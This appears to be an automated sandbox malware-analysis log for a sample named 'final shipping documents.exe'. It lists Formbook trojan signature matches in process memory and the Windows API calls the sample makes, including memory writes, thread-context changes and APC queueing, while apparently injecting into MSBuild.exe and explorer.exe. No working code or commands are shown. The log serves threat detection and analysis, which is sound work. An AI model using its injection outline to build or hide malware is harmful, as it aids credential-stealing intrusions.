Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.2972448445.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.2791031634.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1505929112.0000000003CD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.1572083824.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.1649367924.00000000024E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.2972399366.0000000004C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1505929112.0000000003EF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: final shipping documents.exe PID: 3628, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: MSBuild.exe PID: 6156, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: GcrdXwPgmZ.exe PID: 6664, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: mstsc.exe PID: 7468, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 7592, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: final shipping documents.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041A320 NtCreateFile,	9_2_0041A320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041A3D0 NtReadFile,	9_2_0041A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041A450 NtClose,	9_2_0041A450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041A500 NtAllocateVirtualMemory,	9_2_0041A500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041A31B NtCreateFile,	9_2_0041A31B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041A44B NtClose,	9_2_0041A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041A4FF NtAllocateVirtualMemory,	9_2_0041A4FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_01AA2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2B60 NtClose,LdrInitializeThunk,	9_2_01AA2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2AD0 NtReadFile,LdrInitializeThunk,	9_2_01AA2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_01AA2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2DD0 NtDelayExecution,LdrInitializeThunk,	9_2_01AA2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_01AA2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_01AA2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_01AA2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01AA2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2FB0 NtResumeThread,LdrInitializeThunk,	9_2_01AA2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2F90 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_01AA2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2FE0 NtCreateFile,LdrInitializeThunk,	9_2_01AA2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2F30 NtCreateSection,LdrInitializeThunk,	9_2_01AA2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_01AA2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_01AA2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA4340 NtSetContextThread,	9_2_01AA4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA4650 NtSuspendThread,	9_2_01AA4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2BA0 NtEnumerateValueKey,	9_2_01AA2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2B80 NtQueryInformationFile,	9_2_01AA2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2BE0 NtQueryValueKey,	9_2_01AA2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2AB0 NtWaitForSingleObject,	9_2_01AA2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2AF0 NtWriteFile,	9_2_01AA2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2DB0 NtEnumerateKey,	9_2_01AA2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2D00 NtSetInformationFile,	9_2_01AA2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2CF0 NtOpenProcess,	9_2_01AA2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2CC0 NtQueryVirtualMemory,	9_2_01AA2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2C00 NtQueryInformationProcess,	9_2_01AA2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2C60 NtCreateKey,	9_2_01AA2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2FA0 NtQuerySection,	9_2_01AA2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2F60 NtCreateProcessEx,	9_2_01AA2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2EE0 NtQueueApcThread,	9_2_01AA2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA2E30 NtWriteVirtualMemory,	9_2_01AA2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA3090 NtSetValueKey,	9_2_01AA3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA3010 NtOpenDirectoryObject,	9_2_01AA3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA35C0 NtCreateMutant,	9_2_01AA35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA39B0 NtGetContextThread,	9_2_01AA39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA3D10 NtOpenProcessToken,	9_2_01AA3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA3D70 NtOpenThread,	9_2_01AA3D70
Source: C:\Windows\explorer.exe	Code function: 10_2_0E593E12 NtProtectVirtualMemory,	10_2_0E593E12
Source: C:\Windows\explorer.exe	Code function: 10_2_0E592232 NtCreateFile,	10_2_0E592232
Source: C:\Windows\explorer.exe	Code function: 10_2_0E593E0A NtProtectVirtualMemory,	10_2_0E593E0A

Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_00F9E0CC	0_2_00F9E0CC
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_070063AD	0_2_070063AD
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_0700D620	0_2_0700D620
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_0700F100	0_2_0700F100
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_0700F0F1	0_2_0700F0F1
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_07005D40	0_2_07005D40
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_07004B20	0_2_07004B20
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_07004B30	0_2_07004B30
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_0700DA58	0_2_0700DA58
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_0700FAB0	0_2_0700FAB0
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_070175E8	0_2_070175E8
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_07019F50	0_2_07019F50
Source: C:\Users\user\Desktop\final shipping documents.exe	Code function: 0_2_07014590	0_2_07014590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041EAC3	9_2_0041EAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041E524	9_2_0041E524
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041D580	9_2_0041D580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_00409E50	9_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_00409E0A	9_2_00409E0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_0041EFDF	9_2_0041EFDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B241A2	9_2_01B241A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B301AA	9_2_01B301AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B281CC	9_2_01B281CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A60100	9_2_01A60100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0A118	9_2_01B0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF8158	9_2_01AF8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B02000	9_2_01B02000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B303E6	9_2_01B303E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7E3F0	9_2_01A7E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2A352	9_2_01B2A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AF02C0	9_2_01AF02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10274	9_2_01B10274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B30591	9_2_01B30591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70535	9_2_01A70535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1E4F6	9_2_01B1E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B14420	9_2_01B14420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B22446	9_2_01B22446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6C7C0	9_2_01A6C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70770	9_2_01A70770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A94750	9_2_01A94750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8C6E0	9_2_01A8C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A729A0	9_2_01A729A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B3A9A6	9_2_01B3A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A86962	9_2_01A86962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A568B8	9_2_01A568B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A9E8F0	9_2_01A9E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A72840	9_2_01A72840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7A840	9_2_01A7A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B26BD7	9_2_01B26BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2AB40	9_2_01B2AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6EA80	9_2_01A6EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A88DBF	9_2_01A88DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A6ADE0	9_2_01A6ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7AD00	9_2_01A7AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0CD1F	9_2_01B0CD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B10CB5	9_2_01B10CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A60CF2	9_2_01A60CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70C00	9_2_01A70C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AEEFA0	9_2_01AEEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7CFE0	9_2_01A7CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A62FC8	9_2_01A62FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B12F30	9_2_01B12F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AB2F28	9_2_01AB2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A90F30	9_2_01A90F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE4F40	9_2_01AE4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2CE93	9_2_01B2CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A82E90	9_2_01A82E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2EEDB	9_2_01B2EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2EE26	9_2_01B2EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A70E59	9_2_01A70E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A7B1B0	9_2_01A7B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AA516C	9_2_01AA516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5F172	9_2_01A5F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B3B16B	9_2_01B3B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2F0E0	9_2_01B2F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B270E9	9_2_01B270E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A770C0	9_2_01A770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1F0CC	9_2_01B1F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AB739A	9_2_01AB739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2132D	9_2_01B2132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A5D34C	9_2_01A5D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A752A0	9_2_01A752A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B112ED	9_2_01B112ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8B2C0	9_2_01A8B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0D5B0	9_2_01B0D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B395C3	9_2_01B395C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B27571	9_2_01B27571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2F43F	9_2_01B2F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A61460	9_2_01A61460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2F7B0	9_2_01B2F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B216CC	9_2_01B216CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AB5630	9_2_01AB5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B05910	9_2_01B05910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A79950	9_2_01A79950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8B950	9_2_01A8B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A738E0	9_2_01A738E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01ADD800	9_2_01ADD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8FB80	9_2_01A8FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AADBF9	9_2_01AADBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE5BF0	9_2_01AE5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2FB76	9_2_01B2FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AB5AA0	9_2_01AB5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B11AA3	9_2_01B11AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B0DAAC	9_2_01B0DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B1DAC6	9_2_01B1DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE3A6C	9_2_01AE3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B27A46	9_2_01B27A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2FA49	9_2_01B2FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A8FDC0	9_2_01A8FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B27D73	9_2_01B27D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A73D40	9_2_01A73D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B21D5A	9_2_01B21D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2FCF2	9_2_01B2FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01AE9C32	9_2_01AE9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2FFB1	9_2_01B2FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A71F92	9_2_01A71F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A33FD2	9_2_01A33FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A33FD5	9_2_01A33FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01B2FF09	9_2_01B2FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 9_2_01A79EB0	9_2_01A79EB0
Source: C:\Windows\explorer.exe	Code function: 10_2_0E476232	10_2_0E476232
Source: C:\Windows\explorer.exe	Code function: 10_2_0E470B32	10_2_0E470B32
Source: C:\Windows\explorer.exe	Code function: 10_2_0E470B30	10_2_0E470B30
Source: C:\Windows\explorer.exe	Code function: 10_2_0E475036	10_2_0E475036
Source: C:\Windows\explorer.exe	Code function: 10_2_0E46C082	10_2_0E46C082
Source: C:\Windows\explorer.exe	Code function: 10_2_0E46DD02	10_2_0E46DD02
Source: C:\Windows\explorer.exe	Code function: 10_2_0E473912	10_2_0E473912
Source: C:\Windows\explorer.exe	Code function: 10_2_0E4795CD	10_2_0E4795CD
Source: C:\Windows\explorer.exe	Code function: 10_2_0E592232	10_2_0E592232
Source: C:\Windows\explorer.exe	Code function: 10_2_0E591036	10_2_0E591036
Source: C:\Windows\explorer.exe	Code function: 10_2_0E588082	10_2_0E588082
Source: C:\Windows\explorer.exe	Code function: 10_2_0E58F912	10_2_0E58F912
Source: C:\Windows\explorer.exe	Code function: 10_2_0E589D02	10_2_0E589D02
Source: C:\Windows\explorer.exe	Code function: 10_2_0E58CB30	10_2_0E58CB30
Source: C:\Windows\explorer.exe	Code function: 10_2_0E58CB32	10_2_0E58CB32
Source: C:\Windows\explorer.exe	Code function: 10_2_0E5955CD	10_2_0E5955CD
Source: C:\Windows\explorer.exe	Code function: 10_2_107DF036	10_2_107DF036
Source: C:\Windows\explorer.exe	Code function: 10_2_107D6082	10_2_107D6082
Source: C:\Windows\explorer.exe	Code function: 10_2_107DD912	10_2_107DD912
Source: C:\Windows\explorer.exe	Code function: 10_2_107D7D02	10_2_107D7D02
Source: C:\Windows\explorer.exe	Code function: 10_2_107E35CD	10_2_107E35CD
Source: C:\Windows\explorer.exe	Code function: 10_2_107E0232	10_2_107E0232
Source: C:\Windows\explorer.exe	Code function: 10_2_107DAB30	10_2_107DAB30
Source: C:\Windows\explorer.exe	Code function: 10_2_107DAB32	10_2_107DAB32
